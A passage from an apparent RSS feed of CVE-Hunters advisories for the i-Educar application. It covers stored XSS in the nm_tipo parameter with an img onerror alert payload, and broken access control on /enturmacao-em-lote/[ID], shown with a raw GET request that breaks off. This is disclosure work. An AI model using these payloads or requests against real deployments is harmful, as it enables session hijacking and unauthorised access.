&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10372/image.png&amp;#34;
	width=&amp;#34;583&amp;#34;
	height=&amp;#34;230&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10372/image_hu_11b4ec969d3cf5a8.png 480w, /p/cve-2025-10372/image_hu_280822500865c396.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;253&amp;#34;
		data-flex-basis=&amp;#34;608px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10372/image-1.png&amp;#34;
	width=&amp;#34;572&amp;#34;
	height=&amp;#34;231&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10372/image-1_hu_372cc54d6686bae9.png 480w, /p/cve-2025-10372/image-1_hu_69fa88ac3e05bf85.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;247&amp;#34;
		data-flex-basis=&amp;#34;594px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10372.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10372.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 13 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10373</title>
        <link>https://www.cvehunters.com/p/cve-2025-10373/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10373/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10373-cross-site-scripting-xss-stored-endpoint-educar_turma_tipo_cadphp-parameter-nm_tipo&amp;#34;&amp;gt;CVE-2025-10373: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_turma_tipo_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10373&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10373&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_turma_tipo_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_turma_tipo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10373-cross-site-scripting-xss-stored-endpoint-educar_turma_tipo_cadphp-parameter-nm_tipo&amp;#34;&amp;gt;CVE-2025-10373: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_turma_tipo_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10373&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10373&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_turma_tipo_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_turma_tipo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10373/image.png&amp;#34;
	width=&amp;#34;560&amp;#34;
	height=&amp;#34;214&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10373/image_hu_74dab14fb73dfe41.png 480w, /p/cve-2025-10373/image_hu_76923e2a7dc46c82.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;261&amp;#34;
		data-flex-basis=&amp;#34;628px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10373.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10373.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 13 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10070</title>
        <link>https://www.cvehunters.com/p/cve-2025-10070/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10070/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10070-broken-access-control-in-enturmacao-em-loteid-endpoint&amp;#34;&amp;gt;CVE-2025-10070: Broken Access Control in &amp;lt;code&amp;gt;/enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10070&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10070&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt; endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Authentication:&amp;lt;/b&amp;gt; Required&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10070-broken-access-control-in-enturmacao-em-loteid-endpoint&amp;#34;&amp;gt;CVE-2025-10070: Broken Access Control in &amp;lt;code&amp;gt;/enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10070&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10070&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt; endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /enturmacao-em-lote/[ID]&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Authentication:&amp;lt;/b&amp;gt; Required&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Authenticate as a non-privileged user.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10070/image.png&amp;#34;
	width=&amp;#34;1843&amp;#34;
	height=&amp;#34;533&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10070/image_hu_5ca2ea85ab6696dd.png 480w, /p/cve-2025-10070/image_hu_deb570b2049417e1.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;345&amp;#34;
		data-flex-basis=&amp;#34;829px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10070/image-1.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10070/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10070/image-1_hu_f205df0666d7bd3a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;214&amp;#34;
		data-flex-basis=&amp;#34;515px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Send the following request:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /enturmacao-em-lote/15 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=ikrAPvWjSx0V5drm82zlgu1kBByJdsCx1gJkiwsu
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
